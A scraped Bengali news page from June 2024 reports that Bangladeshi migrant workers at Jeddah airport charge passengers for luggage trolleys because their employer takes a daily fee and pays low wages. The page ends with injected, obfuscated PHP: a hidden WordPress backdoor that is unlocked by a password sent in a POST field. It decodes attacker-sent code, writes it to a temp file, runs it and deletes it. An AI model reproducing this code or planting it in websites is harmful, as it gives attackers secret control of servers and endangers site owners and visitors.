মঙ্গলবার, ১৮ই জুন, ২০২৪ খ্রিস্টাব্দ ৪ঠা আষাঢ়, ১৪৩১ বঙ্গাব্দ

সোলায়মানদের হাঁকডাকের পেছনে অসহায় গল্পটা কেউ জানেনা!

news-image

নিজস্ব প্রতিবেদক : কাছাকাছি সময়ে জেদ্দা আন্তর্জাতিক বিমানবন্দরে নামলো দুইটি উড়োজাহাজ। ইমিগ্রেশন শেষ হবার আগেই বেল্টে চলে গেলো লাগেজ। এক সাথে প্রায় আট’শ যাত্রীর লাগেজ উঠেছে একটি কনভেয়ার বেল্টে।

কিন্তু সমস্যা দেখা দিলো ট্রলি নিয়ে। এতো যাত্রীর লাগেজ। অথচ ট্রলি নিয়ে হাহাকার। ট্রলি নেই কোথাও। এদিকে লাগেজ বহনের জন্য ট্রলি প্রয়োজন। হন্যে হয়ে যখন ট্রলি খোঁজা হচ্ছে তখনই দেখা গেলো ট্রলি সাধছেন একজন বাংলাদেশী।

শুধু একজন নয়, রয়েছে আরো অনেক বাংলাদেশী। তারা নিজে থেকে সেধেই ট্রলি দিতে চাচ্ছেন। তাদের প্রত্যেকের পরনেই রয়েছে কোম্পানির পোশাক। গোটা কনভেয়ার বেল্টের হল ঘরে যখন ট্রলি না পেয়ে চলছে হাহাকার, সকলেই বেশ হয়রান, তখন দেশী চেহারার প্রবাসীদের দেখে বেশ প্রশান্তি কাজ করে মনে। কিন্তু খুব অল্প সময়ের মাঝেই হাওয়া হয়ে যায় এই প্রশান্তি।

কিন্তু কেনো? কারণ ট্রলি এগিয়ে দেবার বিনিময়ে ৬০ সৌদি রিয়াল দাবী করছেন তারা। বাংলাদেশী মূদ্রায় যার মূল্য দাঁড়ায় ১২০০ টাকার বেশি। দরদাম করে ২০ রিয়ালের বিনিময়ে পাওয়া যাবে ট্রলি।

রিয়ালের বিনিময়ে ট্রলি দিতে চাওয়া একজন হলেন নোয়াখালীর সোলায়মান। তার কাছে জানতে চাওয়া হয়েছিল, ‘কেন অর্থের বিনিময়ে ট্রলি নিতে হবে?’ প্রশ্ন শুনে থতমত খেয়ে যান তিনি। কোন উত্তর না দিয়ে অন্য ব্যক্তির সন্ধানে চলে যান তিনি।

পরবর্তীতে কথা হয় ময়মনসিংহ জেলার গফরগাঁও থানার ফকরুল ইসলামের সাথে। তার কাছে জানতে চাওয়া হয়- কেন অর্থের বিনিময়ে ট্রলি নিতে হবে? তারা কি তাদের কাজের জন্য বেতন পান না?

উত্তরে তিনি বলেন, ‘খুবই কষ্টে আছি ভাই। এখানে এই ট্রলি ঠেলতে আসার পেছনে প্রতিদিন ৬০ রিয়াল করে জমা দিতে হয় কোম্পানীকে। এর বাইরে যা পাই সেটাই আমার। বেতন পাই বাংলাদেশি টাকায় ১৫ হাজার টাকা। এই টাকায় নিজে খাবো কি আর পরিবারকে দেবো কি?’

সৌদিতে শ্রম বাজারে কাজের অভাব। স্বজনরা চিন্তা করবে- এমন আশংকায় প্রবাসীরা কাউকে জানান না বা জানতে দেন না নিজের দূর্ভোগের কথা।

সব মিলিয়ে সোলায়মান ও ফকরুল ইসলামরাই যে এখানে প্রবাসী বাংলাদেশিদের একটি বড় অংশের প্রতিনিধিত্ব করছেন- সেটা অকপটেই বলছিলেন ভাগ্য অন্বেষণে মধ্যপ্রাচ্যের তেল সমৃদ্ধ দেশটিতে শ্রম বিক্রি করতে আসা বাংলাদেশীরা। সূত্র : বার্তা ২৪

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}